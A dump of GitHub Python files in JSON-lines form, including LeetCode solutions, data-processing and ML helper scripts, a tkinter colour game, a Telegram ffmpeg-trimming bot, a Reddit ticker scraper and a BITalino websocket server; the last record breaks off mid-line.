pop_arealevel.up_to_date = True\n pop_arealevel.save()\n","repo_name":"GertzGutscheRuemenapp/daviplan","sub_path":"datentool_backend/utils/pop_aggregation.py","file_name":"pop_aggregation.py","file_ext":"py","file_size_in_byte":11934,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"39"} +{"seq_id":"24271279194","text":"class Solution:\n def numUniqueEmails(self, emails: List[str]) -> int:\n unique_emails = set()\n for email in emails:\n local, domain = email.split('@')\n local = local.replace('.','')\n if '+' in local:\n local = local.split('+')[0]\n \n email = local+\"@\"+domain\n unique_emails.add(email)\n return len(unique_emails)","repo_name":"vladanills/leetcode_tasks","sub_path":"0929-unique-email-addresses/0929-unique-email-addresses.py","file_name":"0929-unique-email-addresses.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"35728015938","text":"import pandas as pd\nfrom collections import Counter\nfrom fuzzywuzzy import fuzz\nimport re\nfrom wordcloud import WordCloud\nimport matplotlib.pyplot as plt\n\ndata_Sto = pd.DataFrame()\ndata_Flu = pd.DataFrame()\n\n# 读入文件\ndata1 = pd.read_csv('day_data/' + str(1) + '/' + str(1) + '_StomachacheKeyWords.csv', index_col=False)\ndata2 = pd.read_csv('day_data/' + str(1) + '/' + str(1) + '_FluKeyWords.csv', index_col=False)\ndata_Sto['Words'] = data1.iloc[:, 0]\ndata_Flu['Words'] = data2.iloc[:, 0]\n\n# ----------------------------------------------------------------------------------------------------------------------\n\n# 得到每一天的关键词信息\nfor row in range(21):\n if row == 20:\n row = 29\n\n print(row+1)\n\n # 读入文件\n data1 = pd.read_csv('day_data/'+str(row+1)+'/'+str(row+1)+'_StomachacheKeyWords.csv', index_col=False)\n data2 = pd.read_csv('day_data/'+str(row+1)+'/'+str(row+1)+'_FluKeyWords.csv', index_col=False)\n\n data_Sto[str(row+1)] = data1.iloc[:, 1]\n data_Flu[str(row+1)] = data2.iloc[:, 1]\n\nprint(data_Sto)\nprint(data_Flu)\ndata_Sto.to_csv('StoDayCount.csv', index=False)\ndata_Flu.to_csv('FluDayCount.csv', index=False)","repo_name":"YuyiYuanYYY/Flu-Message","sub_path":"Python/PatientGet.py","file_name":"PatientGet.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"74578537073","text":"import select\n\nf = open('a','r')\nwhile True:\n try:\n rs, ws, es = select.select([f, ], [], [])\n for i in rs:\n buf = i.read()\n print(buf, end='')\n except KeyboardInterrupt:\n f.close()\n break","repo_name":"City-Zero/study_higher_python3","sub_path":"tail/tail_select.py","file_name":"tail_select.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"74165027634","text":"class Solution:\n def longestPalindrome(self, s: str) -> str:\n # Initialize variables to store the longest palindrome and its length\n res = \"\"\n resLen = 0\n length = 0\n \n # Loop through the characters in the input string 's'\n for i in range(len(s)):\n # Check for palindromes with odd length (centered at 'i')\n l = r = i\n while l >= 0 and r < len(s) and s[l] == s[r]:\n length = r - l + 1 # Calculate the length of the current palindrome\n if resLen < length:\n resLen = length\n res = s[l:r + 1] # Update the longest palindrome substring\n l -= 1\n r += 1\n \n # Check for palindromes with even length (centered between 'i' and 'i+1')\n l, r = i, i + 1\n while l >= 0 and r < len(s) and s[l] == s[r]:\n length = r - l + 1 # Calculate the length of the current palindrome\n if resLen < length:\n resLen = length\n res = s[l:r + 1] # Update the longest palindrome substring\n l -= 1\n r += 1\n\n return res # Return the longest palindrome found\n","repo_name":"codingaslu/Leetcode_problems","sub_path":"0005-longest-palindromic-substring/0005-longest-palindromic-substring.py","file_name":"0005-longest-palindromic-substring.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"31398243044","text":"import numpy as np\nimport pickle\nimport joblib\nfrom logger import logger\n\n\nclass Model:\n def carrega_modelo(path, scaler=None):\n \"\"\"Dependendo se o final for .pkl ou .joblib, carregamos de uma forma ou de outra\"\"\"\n\n if path.endswith(\".pkl\"):\n model = pickle.load(open(path, \"rb\"))\n elif path.endswith(\".joblib\"):\n model = joblib.load(path)\n else:\n raise Exception(\"Formato de arquivo não suportado\")\n\n if scaler is not None:\n model.scaler = scaler\n\n return model\n\n def preditor(model, form):\n \"\"\"Realiza a predição de uma pessoa com base no modelo treinado\"\"\"\n X_input = np.array(\n [\n form.person_id,\n form.gender,\n form.age,\n form.sleep_duration,\n form.quality_sleep,\n form.activity_level,\n form.stress_level,\n form.bmi_category,\n form.blood_pressure,\n form.heart_rate,\n form.daily_steps,\n ]\n )\n\n # Faremos o reshape para que o modelo entenda que estamos passando\n X_input = X_input.reshape(1, -1)\n\n # Padronização nos dados de entrada usando o scaler utilizado em X_train\n X_input_scaled = model.scaler.transform(X_input)\n\n # Adicionando uma dimensão extra para corresponder ao formato esperado pelo modelo\n diagnosis = model.predict(X_input_scaled.reshape(1, -1))\n\n logger.info(f\"================ diagnosis[0] ============ : '{diagnosis[0]}'\")\n return int(diagnosis[0])\n\n # Faremos o reshape para que o modelo entenda que estamos passando\n\n # X_input = X_input.reshape(1, -1)\n\n # Padronização nos dados de entrada usando o scaler utilizado em X_train\n # X_input_scaled = model.scaler.transform(X_input)\n\n # Adicionando uma dimensão extra para corresponder ao formato esperado pelo modelo\n # diagnosis = model.predict(X_input_scaled.reshape(1, -1))\n\n # logger.info(f\"================ diagnosis[0] ============ : '{diagnosis[0]}'\")\n\n # return int(diagnosis[0])\n\n # Faremos o reshape para que o modelo entenda que estamos passando\n # logger.info(f\" ============== X_input: '{X_input}'\")\n # diagnosis = model.predict(X_input.reshape(1, -1))\n # return int(diagnosis[0])\n","repo_name":"paularmelo/mvp_qualidade_seguran-a_si","sub_path":"APLICAÇÃO FULL STACK/mvp_sleep_health/api/model/modelo.py","file_name":"modelo.py","file_ext":"py","file_size_in_byte":2373,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"70379730353","text":"import os\nimport numpy as np\nimport cv2\nfrom prefetch_generator import background\nimport concurrent.futures\nimport itertools\nimport threading\nfrom keras.preprocessing.image import ImageDataGenerator as Gen\ndef Load_bgr(category):\n mono_list = []\n red_list = []\n blue_list = []\n green_list = []\n path = \"train_\" + category\n\n for file in os.listdir(path):\n if file != \".DS_Store\":\n filepath = path + \"/\" + file\n src = cv2.imread(filepath, 1)\n src = cv2.resize(src, (256, 256))\n #bgr = np.array(cv2.split(src))\n blue_list.append(np.ravel(src[:,:,0] / 255.0))\n green_list.append(np.ravel(src[:,:,1] / 255.0))\n red_list.append(np.ravel(src[:,:,2] / 255.0))\n gry = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY)\n mono_list.append(np.ravel(gry / 255.0))\n\n blue_list = np.array(blue_list)\n green_list = np.array(green_list)\n red_list = np.array(red_list)\n mono_list = np.array(mono_list)\n\n\n return blue_list, green_list, red_list, mono_list\n\ndef Load_hsv(category, batch_size, hs):\n path = \"train_\" + category\n mono_list = []\n y_list = []\n\n\n datagen = Gen(horizontal_flip=True,\n vertical_flip=True,\n rotation_range=180,\n width_shift_range=0.2,\n height_shift_range=0.2,\n zoom_range=0.3)\n imggen = datagen.flow_from_directory(directory='./', classes=[path], batch_size=1, class_mode=None)\n\n for batch in imggen:\n img = np.flip(batch[0], axis=2)\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n gry = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n if hs == 'h':\n y_list.append(np.ravel(hsv[:,:,0] / 360.0))\n elif hs == 's':\n y_list.append(np.ravel(hsv[:,:,1]))\n mono_list.append(np.ravel(gry / 255.0))\n if len(y_list) == batch_size:\n y_list = np.array(y_list)\n mono_list = np.array(mono_list)\n yield (mono_list, y_list)\n mono_list = []\n y_list = []\n\n\n@background(max_prefetch=320)\ndef Load_cov(category, batch_size, hs):\n path = \"train_\" + category\n\n datagen = Gen(horizontal_flip=True,\n vertical_flip=True,\n rotation_range=180,\n width_shift_range=0.2,\n height_shift_range=0.2,\n zoom_range=0.3)\n imggen = datagen.flow_from_directory(directory='./', classes=[path], batch_size=1, class_mode=None)\n\n\n executor = concurrent.futures.ThreadPoolExecutor(32)\n while True:\n futures = [executor.submit(transform_img, img, hs) for img in itertools.islice(imggen,batch_size)]\n x_list = np.empty((batch_size, 32768))\n y_list = np.empty((batch_size, 16384))\n for i, future in enumerate(futures):\n x, y = future.result()\n x_list[i] = x\n y_list[i] = y\n yield (x_list, y_list)\n\n\ndef transform_img(img, hs):\n img = np.flip(img[0], axis=2)\n img = cv2.resize(img,(128, 128))\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n gry = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n if hs == 'h':\n y = np.ravel(hsv[:,:,0] / 360.0)\n elif hs == 's':\n y = np.ravel(hsv[:,:,1])\n gry_cov = np.cov(gry) / np.max(np.absolute(np.cov(gry)))\n x = np.ravel(np.append(gry/255.0, gry_cov))\n return x, y","repo_name":"L2E0/research","sub_path":"load_train_data.py","file_name":"load_train_data.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"39238196941","text":"def solution(id_pw, db):\n answer = ''\n result = 0\n for i in range(len(db)):\n if db[i][0] == id_pw[0]:\n if db[i][1]==id_pw[1]:\n answer = \"login\"\n return answer\n else:\n answer = \"wrong pw\"\n return answer\n \n answer = \"fail\"\n return answer","repo_name":"min1018/algorithm-study-2022-2","sub_path":"1주차/로그인_성공.py","file_name":"로그인_성공.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"477892852","text":"from tkinter import*\r\nimport pygame\r\nfrom tkinter import messagebox\r\nimport random\r\npygame.mixer.init()\r\nroot=Tk()\r\nroot.geometry('575x200')\r\npoint=0\r\npoint_data=IntVar()\r\ntime_left_data=IntVar()\r\ntime_left=60\r\ncheck=True\r\ntime_left_lab=Label(root,text=f'Time Left: {time_left}',textvariable=time_left_data,font=('Arail',20,'bold'))\r\npoint_label=Label(root,text=f'Point: {point}',textvariable=point_data,font=('Arail',20,'bold'))\r\ntime_left_data.set(f'Time Left: {time_left}')\r\npoint_data.set(f'Point: {point}')\r\ncolours=['Blue','Black','Red','Pink','Yellow','Grey','White','Brown','Cyan','Green','Purple',]\r\ndef time_left_func():\r\n\tglobal time_left\r\n\tglobal check\r\n\tglobal point\r\n\tcheck=False\r\n\ttime_left-=1\r\n\tid=root.after(1000,time_left_func)\r\n\ttime_left_data.set(f'Time Left: {time_left}')\r\n\tif time_left==0:\r\n\t\troot.after_cancel(id)\r\n\t\tQUEs=messagebox.askquestion('QUESTION',f'Times Up!! Your Point Are {point} Do You Want To Play Again?')\r\n\t\tif QUEs=='yes':\r\n\t\t\tinput_.delete(0,END)\r\n\t\t\ttime_left+=60\r\n\t\t\ttime_left_data.set(f'Time Left: {time_left}')\r\n\t\t\troot.after(1000,time_left_func)\r\n\t\t\tpoint-=point\r\n\t\t\tpoint_data.set(f'Point: {point}')\r\n\t\tif QUEs=='no':\r\n\t\t\troot.unbind(\"\")\r\n\t\t\troot.destroy()\r\ndef add_point(event):\r\n\tglobal point\r\n\tglobal check\r\n\tif (colour_label['fg']).lower()==input_.get().lower():\r\n\t\tpoint+=1\r\n\t\tpoint_data.set(f'Point: {point}')\r\n\t\tpygame.mixer.music.load('Good Job!.mp3')\r\n\t\tpygame.mixer.music.play()\r\n\tif (colour_label['fg']).lower()!=input_.get().lower():\r\n\t\tpygame.mixer.music.load('bruh.mp3')\r\n\t\tpygame.mixer.music.play()\r\n\tguide.place(x=4393)\r\n\ttime_left_lab.place(x=375,y=35)\r\n\tpoint_label.place(x=415,y=75)\r\n\tcolour_label.config(text=random.choice(colours))\r\n\tcolour_label.config(fg=random.choice(colours))\r\n\tif check==True:\r\n\t\ttime_left_func()\r\n\tinput_.delete(0,END)\r\nroot.title('Colour Game!')\r\nheAd=Label(root,text='Tip:Type in the colour of the words and do not type the text',font=('Arail',15,'bold')).pack()\r\nguide=Label(root,text='Press Enter To Start The Game!!',font=('Arail',15,'bold'))\r\nguide.pack()\r\ninput_=Entry(root,font=('Arail',17,'bold'),width=20)\r\ninput_.place(x=125,y=160)\r\ncolour_label=Label(root,text='',font=('Arial Rounded MT Bold',55,'bold'))\r\ncolour_label.place(x=136,y=45)\r\nroot.bind('',add_point)\r\nmainloop()\r\n","repo_name":"RishiRatanPandey/colour-game","sub_path":"colour game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"70134445553","text":"import copy\n\nimport math\nimport numpy\nfrom sklearn.decomposition import PCA\n\n\ndef sqrt_quadratic_sum(list):\n \"\"\"\n 将测量数据平方相加,再开根号\\n\n :param list: 含有xyz数组的list:[[x1,y1,z1],[x2,y2,z2],...]\n :return: [sqrt(x1^2 + y1^2 + z1^2), sqrt(x2^2 + y2^2 + z2^2), ...]\n \"\"\"\n result = []\n for child_list in list:\n result.append(math.sqrt(child_list[0] ** 2 + child_list[1] ** 2 + child_list[2] ** 2))\n return result\n\n\ndef fill_list(list, length, num=0):\n \"\"\"\n 把list用num填充至length长度\n :param list: 要填充的list\n :param num: 填充的数字\n :param length: 填充到的长度\n \"\"\"\n if len(list) >= length:\n origin_list = copy.deepcopy(list)\n list.clear()\n for i in range(length):\n list.append(origin_list[i])\n\n else:\n for i in range(length - len(list)):\n list.append(num)\n\n\ndef zoom_list(data, length, value):\n \"\"\"\n 压缩list\n :param list:\n :param length:最大长度\n :param value: 最大值\n \"\"\"\n\n list = data\n\n max_value = list[numpy.argmax(list)]\n\n if type(data) is numpy.ndarray:\n list = data.tolist()\n\n data_len = len(list)\n\n if max_value > value:\n zoom = value / max_value\n print(zoom)\n for i in range(len(list)):\n list[i] = list[i] * zoom\n\n if data_len <= length:\n return list\n\n diff = data_len - length\n step = int(data_len / diff)\n\n del_num = 0\n for i, val in enumerate(list):\n\n if i % (step + 1) == 0:\n del list[i - del_num]\n del_num += 1\n return list\n\n\ndef cut_invalid(data, value):\n \"\"\"\n 去除data中前后小于value的所有数据。\n 如果list刚开始就大于value,一旦出现小于的时候再开始检测。+\n :param data:\n :param value:\n \"\"\"\n if len(data) == 0:\n return []\n\n index = 0\n index_reverse = len(data)\n\n start = True\n\n if data[0] > value:\n start = False\n\n for i in range(len(data)):\n if start:\n if data[i] > value:\n index = i\n break\n else:\n if data[i] < value:\n start = True\n\n for r in list(range(0, len(data)))[::-1]:\n if data[r] > value:\n index_reverse = r\n break\n\n return data[index:index_reverse]\n\n\ndef pca(arr, dimention=1) -> numpy.core.multiarray:\n result = PCA(n_components=dimention)\n new_arr = result.fit_transform(arr)\n data = numpy.reshape(new_arr, len(new_arr), -1)\n return data\n\n\ndef paa(arr, size) -> numpy.core.multiarray:\n length = len(arr)\n if length == size:\n return arr\n else:\n if length % size == -1:\n return numpy.mean(numpy.hsplit(arr, size), axis=1)\n else:\n res = numpy.zeros(size)\n for i in range(length * size):\n idx = int(i / length)\n pos = int(i / size)\n res[idx] = res[idx] + arr[pos]\n for i in range(0, size):\n res[i] = res[i] / length\n return res\n\n\ndef vector_cos(v1, v2):\n return v1.dot(v2) / (numpy.sqrt(v1.dot(v1)) * numpy.sqrt(v2.dot(v2)))\n\n\n# 删除data中比max大和比min小的数字\ndef delete_max_min(data, max, min):\n result = []\n for i, d in enumerate(data):\n if max > data[i] > min:\n result.append(data[i])\n return numpy.array(result)\n","repo_name":"SailFlorve/TiaoZhanBeiProject","sub_path":"sail/algorithm/data_processor.py","file_name":"data_processor.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"27433812504","text":"\"\"\"\n167. Two Sum II - Input Array Is Sorted\nhttps://leetcode.com/problems/two-sum-ii-input-array-is-sorted/\n\nUsar l, r pointers para 0 y para len(n)-1, si se pasa la suma restar r, si le falta sumar l.\nNotar que pide (1-indexed) significa que index0 es index1, entonces sumar 1 a cada pointer al final\n\ntime O(n) recorreremos el arreglo una vez.\nspace O(1). Usamos un espacio constante, ya que solo almacenamos dos punteros y variables\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution2:\n def twoSum(self, numbers: List[int], target: int) -> List[int]:\n left, right = 0, len(numbers) - 1\n\n while left < right:\n current_sum = numbers[left] + numbers[right]\n\n if current_sum == target:\n return [left + 1, right + 1]\n elif current_sum < target:\n left += 1\n else:\n right -= 1\n return []\n\n\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n l, r = 0, len(nums) - 1\n\n while l < r:\n sum = nums[l] + nums[r]\n if sum == target:\n return [l + 1, r + 1]\n elif sum > target:\n r -= 1\n else:\n l += 1\n\n return []\n\n\nif __name__ == \"__main__\":\n solution = Solution()\n\n print(solution.twoSum([2, 7, 11, 15], 9)) # Debería imprimir [1, 2]\n print(solution.twoSum([2, 3, 4], 6)) # Debería imprimir [1, 3]\n print(solution.twoSum([-1, 0], -1)) # Debería imprimir [1, 2]\n","repo_name":"scyanh/needcode","sub_path":"leetcode150/2_two pointers/3_Two Sum II - Input Array Is Sorted/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"42686187980","text":"import os, datetime, glob, subprocess, json\nfrom pyrogram import Client, filters\nfrom pyrogram.types import InlineKeyboardMarkup, InlineKeyboardButton, Message\nimport keyboard as kb\nimport pygetwindow as gw\n\nwin = gw.getActiveWindow()\n\nBOT_TOKEN = \" \"\nAPI_ID = \" \"\nAPI_HASH = \" \"\n\nBot = Client(\n \":memory:\",\n bot_token = BOT_TOKEN,\n api_id = API_ID,\n api_hash = API_HASH\n)\n\nrefresh_button = [\n InlineKeyboardButton(\n text='Refresh List',\n callback_data='refresh'\n )\n]\n\nmsgid = 0\nchatid = 0\n\n@Bot.on_message(filters.command(['resume']) & filters.private)\nasync def edame(client, message):\n win.activate()\n kb.press_and_release('enter')\n await message.reply('resumed.')\n\n@Bot.on_message(filters.command(['stop']) & filters.private)\nasync def estop(client, message):\n win.activate()\n kb.press_and_release('pause')\n await message.reply('stoped. to resume send /resume')\n\n@Bot.on_message(filters.command(['cancel']) & filters.private)\nasync def kansel(client, message):\n await message.reply('canceled.')\n exit(0)\n\n@Bot.on_message(filters.text & ~filters.regex('/previous'))\nasync def start(bot, m):\n keyboard = []\n keyboard.append(refresh_button)\n try:\n for file in glob.glob('C:/dlmacvin/1aa/*'):\n if file.endswith(('.ts', '.mp4', '.mkv')):\n keyboard.append(\n [\n InlineKeyboardButton(\n text=file.rsplit('/', 1)[1].replace('1aa\\\\', ''),\n callback_data=file.rsplit('/', 1)[1].replace('1aa\\\\', '')\n )\n ]\n )\n except Exception as e:\n print(e)\n return\n keyboard.append(refresh_button)\n #await bot.send_message(chat_id=id, text=\"Which one?\", reply_markup=InlineKeyboardMarkup(keyboard))\n await m.reply_text(text=\"Which one?\", reply_markup=InlineKeyboardMarkup(keyboard))\n\n\n@Bot.on_callback_query()\nasync def callback(bot, update):\n global chatid, msgid\n if update.data == \"refresh\":\n keyboard = []\n keyboard.append(refresh_button)\n try:\n for file in glob.glob('C:/dlmacvin/1aa/*'):\n if file.endswith(('.ts', '.mp4', '.mkv')):\n keyboard.append(\n [\n InlineKeyboardButton(\n text=file.rsplit('/', 1)[1].replace('1aa\\\\', ''),\n callback_data=file.rsplit('/', 1)[1].replace('1aa\\\\', '')\n )\n ]\n )\n except Exception as e:\n print(e)\n return\n keyboard.append(refresh_button)\n try:\n await update.message.edit(text=f\"Which one of these {len(keyboard)} videos?\", reply_markup=InlineKeyboardMarkup(keyboard))\n except:\n await update.message.reply_text(\"error!! Send /start\")\n return\n try:\n name = update.data\n input = 'C:/dlmacvin/1aa/' + name\n process_msg = await update.message.reply_text('Processing..\\nFor cancel send /cancel\\nFor stop send /stop')\n ext = '.' + name.rsplit('.', 1)[1]\n out = 'C:/dlmacvin/1aa/videos/'+name\n os.system(f'''ffmpeg -ss 00:00:00 -i \"{input}\" -to 00:20:00 -c copy -y \"{out}\"''')\n await process_msg.delete()\n if chatid == 0:\n msg = await update.message.reply_text('Done! ' + out)\n msgid = msg.message_id\n elif chatid != 0:\n try:\n await bot.edit_message_text(update.message.chat.id, msgid, 'Done! ' + out)\n except:\n await bot.edit_message_text(update.message.chat.id, msgid, 'تمام')\n chatid = update.message.from_user.id\n\n except:\n pass\n\n\n\nBot.run()\n","repo_name":"Soebb/cut20min","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"1447729313","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunctions\r\nIntro to Python Workshop\r\n\r\n\"\"\"\r\n# Functions are reusable blocks of code that we call when needed\r\n# You should call them whatever you like, just don't use one of Python's \r\n# built-in functions (such as input(), type(), float(), etc.)\r\n# Functions are called using the the def() reserved word\r\n\r\n# Structure: function name, arguments, parameters, return\r\n# an argument is a value passed into the function as its input when called\r\n# a parameter is a variable used in function defintion\r\n# 'return' - returns a value from executing the function and \"sends back\" result\r\n\r\n# Here is a simple function, which prints three lines of truth\r\nprint ('Lithium')\r\ndef print_lyrics():\r\n print (\"I'm so happy because today\")\r\n print (\"I've found my friends\")\r\n print (\"They're in my head\") \r\nprint_lyrics()\r\nprint ('Yeah')\r\n\r\n# Note some things about the architecture in the statement above\r\n# You need the def statement, a name, and then parameters (as needed)\r\n# You often will want to return values for these, as you're often passing\r\n# them off to be used later. A more relevant example below\r\n\r\nx = [10,15,3,4,11,15]\r\ny = [2,20,3,6,7,22]\r\n\r\ndef get_means(xvals,yvals):\r\n xcoords = sum(xvals)/len(xvals)\r\n ycoords = sum(yvals)/len(yvals)\r\n return xcoords,ycoords\r\n\r\nvals = get_means(x,y)\r\nprint ('The mean center is: ' '%.1f' % vals[0],',',vals[1])\r\n\r\n\r\n# Standard Distance Function \r\n# Another example of calling a library that isn't already loaded\r\nimport math\r\n\r\ndef getsd(xvals,yvals):\r\n meanx = sum(xvals)/len(xvals)\r\n meany = sum(yvals)/len(yvals)\r\n evalx = []\r\n evaly = []\r\n for i in xvals:\r\n xl = (i-meanx)**2\r\n evalx.append(xl)\r\n for i in yvals:\r\n yl = (i-meany)**2\r\n evaly.append(yl)\r\n z = math.sqrt((((sum(evalx)/len(evalx)) + (sum(evaly)/len(evaly)))))\r\n return z\r\n\r\nsd = getsd(x,y)\r\nprint ('The standard distance is: ' '%.2f' % sd)\r\n ","repo_name":"moni-roy/GRAD-778","sub_path":"Intro To Python/Course Materials/Module 7 - Functions/7_Functions.py","file_name":"7_Functions.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"304909711","text":"from tornado import websocket, web, ioloop\r\nimport thread\r\nimport json\r\nimport signal\r\nimport sys\r\nimport numpy\r\nimport time\r\nimport sys, traceback, os\r\nfrom bitalino import *\r\nfrom os.path import expanduser\r\nimport threading\r\n\r\ncl = []\r\ntflag = True\r\n\r\ndef tostring(data):\r\n \"\"\"\r\n :param data: object to be converted into a JSON-compatible `str`\r\n :type data: any\r\n :return: JSON-compatible `str` version of `data`\r\n \r\n Converts `data` from its native data type to a JSON-compatible `str`.\r\n \"\"\"\r\n dtype=type(data).__name__\r\n if dtype=='ndarray':\r\n if numpy.shape(data)!=(): data=data.tolist() # data=list(data)\r\n else: data='\"'+data.tostring()+'\"'\r\n elif dtype=='dict' or dtype=='tuple':\r\n try: data=json.dumps(data)\r\n except: pass\r\n elif dtype=='NoneType':\r\n data=''\r\n elif dtype=='str' or dtype=='unicode':\r\n data=json.dumps(data)\r\n \r\n return str(data)\r\n\r\n\r\nclass SocketHandler(websocket.WebSocketHandler):\r\n def check_origin(self, origin):\r\n return True\r\n\r\n def open(self):\r\n global tflag\r\n if self not in cl:\r\n cl.append(self)\r\n print(\"CONNECTED\")\r\n tflag = True\r\n\r\n def on_message(self, message):\r\n self.write_message(u\"You said: \" + message)\r\n\r\n def on_close(self):\r\n if self in cl:\r\n cl.remove(self)\r\n print(\"DISCONNECTED\")\r\n\r\ndef signal_handler(signal, frame):\r\n print('TERMINATED')\r\n sys.exit(0)\r\n\r\ndef BITalino_handler(mac_addr, ch_mask, srate, labels):\r\n #labels = [\"'nSeq'\", \"'I1'\", \"'I2'\", \"'O1'\", \"'O2'\", \"'A1'\", \"'A2'\", \"'A3'\", \"'A4'\", \"'A5'\", \"'A6'\"]\r\n ch_mask = numpy.array(ch_mask)-1\r\n try:\r\n print(mac_addr)\r\n device=BITalino(mac_addr)\r\n print(ch_mask)\r\n print(srate)\r\n device.start(srate, ch_mask)\r\n cols = numpy.arange(len(ch_mask)+5)\r\n while (1):\r\n data=device.read(250)\r\n res = \"{\"\r\n for i in cols:\r\n idx = i\r\n if (i>4): idx=ch_mask[i-5]+5\r\n res += '\"'+labels[idx]+'\":'+tostring(data[:,i])+','\r\n res = res[:-1]+\"}\"\r\n if len(cl)>0: cl[-1].write_message(res)\r\n except:\r\n traceback.print_exc()\r\n os._exit(0)\r\n\r\n\r\ndef printHi():\r\n global tflag\r\n tflag = True\r\n\r\ndef BITalino_simulate(mac_addr, ch_mask, srate, labels):\r\n #labels = [\"'nSeq'\", \"'I1'\", \"'I2'\", \"'O1'\", \"'O2'\", \"'A1'\", \"'A2'\", \"'A3'\", \"'A4'\", \"'A5'\", \"'A6'\"]\r\n global tflag\r\n ch_mask = numpy.array(ch_mask)-1\r\n DATA = numpy.loadtxt('D:/github/wring/PZT_3_2.txt')\r\n dsrate = 1000\r\n buffer_size = 250\r\n xi = 0\r\n xf = buffer_size\r\n data = DATA[xi:xf,:]\r\n xi = xf\r\n maxdata = 361000\r\n firstcall = True\r\n update_rate = 1.0*buffer_size/srate\r\n# update_rate = 0.250\r\n# update_rate = 2\r\n\r\n print(update_rate)\r\n try:\r\n print(\"ch_mask: \", ch_mask)\r\n print(\"srate: \", srate)\r\n print(\"labels:\", labels)\r\n cols = numpy.arange(len(ch_mask)+5)\r\n print(\"cols:\", cols)\r\n while (1):\r\n # Create timer\r\n if firstcall or tflag:\r\n threading.Timer(update_rate, printHi).start()\r\n\r\n tflag = False\r\n firstcall = False\r\n\r\n data = numpy.roll(data, -buffer_size, axis = 0)\r\n xf = (xf % maxdata) + buffer_size\r\n data_buffer = DATA[xi:xf,:]\r\n \r\n xi = xf % maxdata\r\n data[-buffer_size:,:] = data_buffer\r\n\r\n\r\n\r\n res = \"{\"\r\n for i in cols:\r\n idx = i\r\n if (i>4): idx=ch_mask[i-5]+1\r\n res += '\"'+labels[idx]+'\":'+tostring(data[:,i])+','\r\n res = res[:-1]+\"}\"\r\n if len(cl)>0: cl[-1].write_message(res)\r\n except:\r\n traceback.print_exc()\r\n os._exit(0) \r\n\r\n\r\napp = web.Application([(r'/', SocketHandler)])\r\n\r\nif __name__ == '__main__':\r\n home = expanduser(\"~\") + '/ServerBIT'\r\n print(home)\r\n try:\r\n with open(home+'/config.json') as data_file:\r\n config = json.load(data_file)\r\n print(config)\r\n except:\r\n with open('config.json') as data_file:\r\n config = json.load(data_file)\r\n os.mkdir(home)\r\n with open(home+'/config.json', 'w') as outfile:\r\n json.dump(config, outfile)\r\n signal.signal(signal.SIGINT, signal_handler)\r\n app.listen(config['port'])\r\n print('LISTENING')\r\n# thread.start_new_thread(BITalino_handler, (config['device'],config['channels'],config['sampling_rate'], config['labels']))\r\n thread.start_new_thread(BITalino_simulate, (config['device'],config['channels'],config['sampling_rate'], config['labels']))\r\n ioloop.IOLoop.instance().start()\r\n \r\n","repo_name":"malfarasplux/sigaloud","sub_path":"soundrebound/ServerBIT.py","file_name":"ServerBIT.py","file_ext":"py","file_size_in_byte":4860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"5161540625","text":"#!/usr/bin/env python3\n\nclass MyPoint(object):\n def __init__(self, x=0, y=0):\n self.__x = x\n self.__y = y\n\n def __str__(self):\n return \"(\" + str(self.__x) + \", \" + str(self.__y) + \")\"\n\ndef main():\n r1 = MyPoint(3, 4)\n r2 = MyPoint()\n r3 = MyPoint(1)\n r4 = MyPoint(y = 10)\n print(r1)\n print()\n print(r2)\n print()\n print(r3)\n print()\n print(r4)\n\nmain()\n","repo_name":"DiamondBond/labs","sub_path":"py/lab9/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"27860056459","text":"from psaw import PushshiftAPI\nimport datetime\nimport finnhub\nimport pprint\n\napi = PushshiftAPI()\ndt = datetime.datetime.today()\ndate = int(datetime.datetime(dt.year,dt.month,dt.day).timestamp())\n#Need to do env when we move it to backend \nfinnhub_client = finnhub.Client(api_key=\"c371jnaad3ib6g7egdag\")\n\n\narticles = list(api.search_submissions(after = date,subreddit = 'wallstreetbets', filter =['url','author', 'title', 'subreddit'] ))\nredditTickers ={}\nfor article in articles:\n words = article.title.split()\n tickers= list(filter(lambda word:word.lower().startswith('$'), 